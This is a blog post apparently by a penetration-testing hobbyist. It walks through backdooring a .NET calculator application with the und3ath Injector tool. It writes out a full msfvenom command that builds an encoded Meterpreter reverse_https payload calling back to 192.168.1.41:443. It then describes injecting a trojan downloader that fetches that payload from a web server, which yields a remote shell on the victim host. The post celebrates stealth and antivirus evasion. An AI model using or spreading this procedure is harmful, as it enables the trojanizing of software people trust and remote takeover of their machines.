Injecting arbritary code into .

NET Assemblies using und3ath Injector

Posted on by infodox Last night I was browsing a forum I frequent http://trojanforge.com/ and came across a piece of code named und3ath Injector written by a user named und3ath. It claimed to be capable of injecting arbritary code into .NET assemblies without harming the original code in short a stealth backdooring tool for .NET executables. The authors article and release can be found on his blog here: http://und3ath.blogspot.fr/2012/10/source-d3ath-jector-mono-cecil-injector.html this guy is a very good .NET programmer, I expect he will come out with more awesome things soon This, to me, was fascinating. What it does is it directly injects evil code into the .net executable into one of the functions or forms that comprise the assembly, without altering the functionality of the original. It simply sneakily adds a Little Extra. The fact I fucking hate .NET with a passion meant I saw a hilarious extra Evil side to this! A trojanizer for .NET executables? AWESOME. I had trouble in the past injecting MSF payloads into .NET binaries without breaking the original binary. The proof of concept tool und3ath Injector has two payloads. A Messagebox payload and a Trojan Downloader payload. The first is proof the damn thing works, the second a more weaponized payload for dropping malware or backdoors on a victim system. One of the benefits of using a downloader instead of hiding a full backdoor in there is stealth less modifications to the file, and less for an AV to sign on. So, without further ado, I am going to inject a dropper into a .NET binary, and see does it function as planned. The dropper will download a Meterpreter payload from a remote server, execute the payload, and we will take it from there Before we do anything, we will generate our Metasploit Payload to run on the victim system and place in our webroot. The following should do the trick msfvenom -p windows/meterpreter/reverse_https -f exe -e x86/shikata_ga_nai -i 25 LHOST=192.168.1.41 LPORT=443 >evil.exe This creates the executable file evil.exe in our current working directory. The msfvenom command should be self explanatory, but if there is demand for it I will write an article later on using msfvenom. If you are capable of reading the f*cking manual you should get it

Creating the Meterpreter payload So we have our evil binary in /var/www/lulz ready to go. We can now move on to the main part of this article backdooring .NET assemblies by patching them with extra .NET code. The victim .NET binary I chose to use is a simple calculator application. I found it online and decided it made a good enough victim for demonstration purposes. Here is a screenshot of it running, for those of you who do not know what a calculator is

.NET calculator Now. We open und3ath Injector and select Load File. Use this dialogue to select the binary you wish to backdoor.

Selecting a file to backdoor Next we click on any of the parts that we think would be good to inject code into (I normally choose the main class for some odd reason, though you could select an on click event) When we click on this the Payloader menu comes up. We insert our information/selection here.

Create the Payload When you click inject, it starts creating a new binary for you to use and you save it.

Saving the Backdoor Now, we have our evil binary ready to deploy, and have our Metasploit listener ready. We run the modified binary on the victim host and haz shell

Got a shell =D So, as you an see, it is relatively trivial to inject arbritary code into a .NET assembly without affecting the existing functionality of the software.